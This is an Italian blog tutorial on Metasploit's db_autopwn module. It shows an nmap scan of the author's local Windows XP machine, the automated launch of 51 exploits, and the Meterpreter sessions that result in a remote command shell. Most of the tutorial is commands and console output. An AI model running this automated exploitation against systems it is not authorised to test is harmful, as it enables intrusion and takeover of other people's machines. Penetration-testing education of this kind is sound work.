ClsHack.it

Dalla versione di Metasploit 3 è stato introdotto un modulo chiamato “autopwn” che è in grado di automatizzare la fase di exploit di un penetration test.

Per automatizzare, intendo dire che metasploit, autopwn, sarà in grado di decidere da solo quali exploit, eseguire automaticamente sulla vittima, attraverso l’analisi dei risultati di ad esempio nmap,openvas e altri scanner di vulnerabilità.
==Articoli correlati:==
[guida]Testare la sicurezza di rete con nmap
[Scanner di Vulnerabilità]Compilare OpenVAS 3 su UBUNTU
==(altri articoli, li trovate in fondo a questo articolo)==

Autopwn, non è ancora in grado di sostituire il nostro lavoro di ricerca e di test, ma un buon umm 70 % !

Nmap, può essere eseguito dall’interno della console di Metasploit grazie al modulo db_nmap grazie al quale, metasploit, archivierà i risultati nel database al fine di sfruttarli con Autopwn.

Autopwn purtroppo, ha alcune limitazioni, intanto necessita di un database MySQL, Sqlite, oppure Postgres.
In termini di payloads con la corrente versione si può usare una bind shell di base come payload.

Va beh comunque, vediamo come utilizzare questo a dir poco fantastico modulo.
Apriamo la console di metasploit.

Digitiamo, per creare un nuovo database dove mettere i risultati:
db_create metasploit
Questo sarà il nostro output:
msf > db_create metasploit
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: metasploit
Se avremo errori, controlliamo di avere installato sqllite.

Digitiamo ora help, per vedere i nuovi comandi disponibili.
Ad esempio possiamo vedere:
db_import_amap_mlog Import a THC-Amap scan results file (-o -m)
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nessus_nbe Import a Nessus scan result file (NESSUS)
db_import_nmap_xml Import a Nmap scan results file (-oX)

Ho sottolineato
db_import_nessus_nbe che, potrà permetterci di importare i risultati di openvas.

Noi, utilizzeremo il modulo db_autopwn.
Per vedere le use opzioni, digitiamo semplice db_autopwn .
msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf >


Il bello del modulo di autopwn è l’esaminare le tabelle del database e creare una lista di exploit che corrispondono a quei specifichi servizi,porte e vulnerabilità.

Vediamo ora un esempio di autopwn insieme a nmap su di una mia macchina qindows xp in local :D
Quindi digitiamo:
db_nmap 192.168.0.44 --osscan-guess -sV
Dove naturalmente sostituirete l’ip e cambierete le opzioni di nmap a seconda delle vostre esigenze.
Avremo un output simile a questo:

Starting Nmap 5.21 ( http://nmap.org ) at 2010-02-10 16:43 CET
Nmap scan report for 192.168.0.44
Host is up (0.00087s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 08:00:27:89:E8:D3 (Cadmus Computer Systems)
Service Info: OS: Windows
msf >


Per vedere i ervizi trovati da nmap, digitiamo:
db_service NOME_DB
Esempio:
db_services metasploit
Esempio:
msf > db_services metasploit

Services
========

created info name port proto state Host Workspace
------- ---- ---- ---- ----- ----- ---- ---------
Wed Feb 10 16:43:29 +0100 2010 Microsoft Windows RPC msrpc 135 tcp open 192.168.0.44 default
Wed Feb 10 16:43:29 +0100 2010 netbios-ssn 139 tcp open 192.168.0.44 default
Wed Feb 10 16:43:29 +0100 2010 Microsoft Windows XP microsoft-ds microsoft-ds 445 tcp open 192.168.0.44 default
Wed Feb 10 16:43:29 +0100 2010 Microsoft HTTPAPI httpd 1.0 SSDP/UPnP http 2869 tcp open 192.168.0.44 default

msf >

Ora è il momento di eseguire il comando db_autopwn e vedere quali exploit esegue.
Quindi digitiamo:
db_autopwn -x -p -e -R great
Le opzioni di db_autopwn le abbiamo viste prima ;)

L’unica che non si capisce molto bene, è la -R cioè seleziono il rank dell’exploit.
I suoi valori sono: “excellent”, “great”, “good”, “normal”, “average”, “low” e “manual”.
Per visualizzare gli exploit con il rank indicato, digitiamo:
search -r VALORE

Sulla mia macchina, sono stati testati 51 exploit…
Ecco un output:

msf > db_autopwn -x -p -e -R great
[*] (1/51 [0 sessions]): Launching exploit/unix/webapp/cacti_graphimage_exec against 192.168.0.44:2869...
[*] (2/51 [0 sessions]): Launching exploit/unix/webapp/php_wordpress_lastpost against 192.168.0.44:2869...
[*] (3/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.0.44:139...


Per interagire con le eventuali sessioni aperte, si usa il comando sessions -i [ID].
Ma prima visualizziamo le sessioni:
digitando:
sessions -l

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.0.153:56786 -> 192.168.0.44:40090
2 Meterpreter 192.168.0.153:37634 -> 192.168.0.44:33876

msf >

Selezioniamo la sessione:
sessions -i 1

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1332 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
eeee buon divertimento :D

Altri:

1. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
2. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
3. [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
4. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
5. Metasploit 3.4 and Metasploitable